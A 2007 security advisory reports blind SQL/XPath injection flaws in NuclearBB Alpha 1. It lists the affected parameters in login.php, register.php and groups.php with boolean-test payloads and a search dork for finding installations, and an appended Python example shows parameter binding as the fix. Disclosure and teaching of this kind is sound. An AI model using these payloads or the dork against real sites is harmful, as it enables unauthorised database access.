NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection


Date: 18 Apr 2007 19:16:26 -0000
From: john@martinelli.com
To: bugtraq@securityfocus.com
Subject: NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection
 Vulnerabilities

NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities

Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"


=============
String Inputs
=============

----------------------------
login.php - $_POST['submit']

username=xyz
password=passxyz
submit=Login"+and+"1"="0

--------------------------------
register.php - $_POST['website']

username=xyz@xyz.com
email=xyz@xyz.com
pass1=passwordxyz
pass2=passwordxyz
website=xyz@xyz.com"+and+"1"="0
location=xyz@xyz.com
msn=xyz@xyz.com
yahoo=xyz@xyz.com
aol=xyz@xyz.com
icq=xyz@xyz.com
signature=xyz@xyz.com
coppa_state=over
register_submit=Register

----------------------------
register.php - $_POST['aol']

username=xyz@xyz.com
email=xyz@xyz.com
pass1=xyz@xyz.com
pass2=xyz@xyz.com
website=xyz@xyz.com
location=xyz@xyz.com
msn=xyz@xyz.com
yahoo=xyz@xyz.com
aol=xyz@xyz.com"+and+"1"="0
icq=xyz@xyz.com
signature=xyz@xyz.com
coppa_state=over
register_submit=Register

----------------------------------
register.php - $_POST['signature']

username=xyz@xyz.com
email=xyz@xyz.com
pass1=xyz@xyz.com
pass2=xyz@xyz.com
website=xyz@xyz.com
location=xyz@xyz.com
msn=xyz@xyz.com
yahoo=xyz@xyz.com
aol=xyz@xyz.com
icq=xyz@xyz.com
signature=xyz@xyz.com"+and+"1"="0
coppa_state=over
register_submit=Register

==============
Numeric Inputs
==============

-----------------------
groups.php - $_GET['g']

http://www.example.com/groups.php?g=1+and+1=0

------------------------------
register.php - $_POST['email']

username=xyz@xyz.com
email=xyz@xyz.com+and+1=0
pass1=xyz@xyz.com
pass2=xyz@xyz.com
website=xyz@xyz.com
location=xyz@xyz.com
msn=xyz@xyz.com
yahoo=xyz@xyz.com
aol=xyz@xyz.com
icq=xyz@xyz.com
signature=xyz@xyz.com
coppa_state=over&register_submit=Register


John Martinelli
john@martinelli.com
http://john-martinelli.com

April 18th, 2007
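
Added example (not part of the original advisory and not NuclearBB code): how the `g=1+and+1=0` value reported for groups.php changes a query built by string concatenation, and how integer validation plus bound parameters remove that behaviour for both the numeric and the string inputs listed above. SQLite stands in for the forum's database; the table, column and function names are hypothetical and the data is constructed.

```python
import sqlite3
from urllib.parse import unquote_plus

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE groups (id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("CREATE TABLE users (username TEXT, website TEXT)")
    db.execute("INSERT INTO groups VALUES (1, 'Administrators')")
    return db

def group_concat(db, raw_g):
    # Vulnerable pattern: the decoded parameter becomes part of the SQL text,
    # so "1 and 1=0" is parsed as a condition instead of a value.
    g = unquote_plus(raw_g)
    return db.execute("SELECT name FROM groups WHERE id = " + g).fetchall()

def group_bound(db, raw_g):
    # Hardened: accept ASCII digits only, then bind the value as a parameter.
    g = unquote_plus(raw_g)
    if not (g.isascii() and g.isdigit()):
        raise ValueError("g must be an unsigned integer")
    return db.execute("SELECT name FROM groups WHERE id = ?", (int(g),)).fetchall()

def save_website(db, username, raw_website):
    # Hardened string input: a bound value is stored as data, quotes included.
    website = unquote_plus(raw_website)
    db.execute("INSERT INTO users VALUES (?, ?)", (username, website))
    row = db.execute("SELECT website FROM users WHERE username = ?",
                     (username,)).fetchone()
    return row[0]

if __name__ == "__main__":
    db = make_db()
    print("concat, g=1        :", group_concat(db, "1"))
    print("concat, g=1+and+1=0:", group_concat(db, "1+and+1=0"))
    print("bound,  g=1        :", group_bound(db, "1"))
    try:
        group_bound(db, "1+and+1=0")
    except ValueError as exc:
        print("bound,  g=1+and+1=0: rejected,", exc)
    print("stored website     :", save_website(db, "xyz", 'xyz@xyz.com"+and+"1"="0'))
```

A differing result between the first two calls is the signal that request data is reaching the SQL parser; with the bound versions the same inputs are either rejected or stored verbatim.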

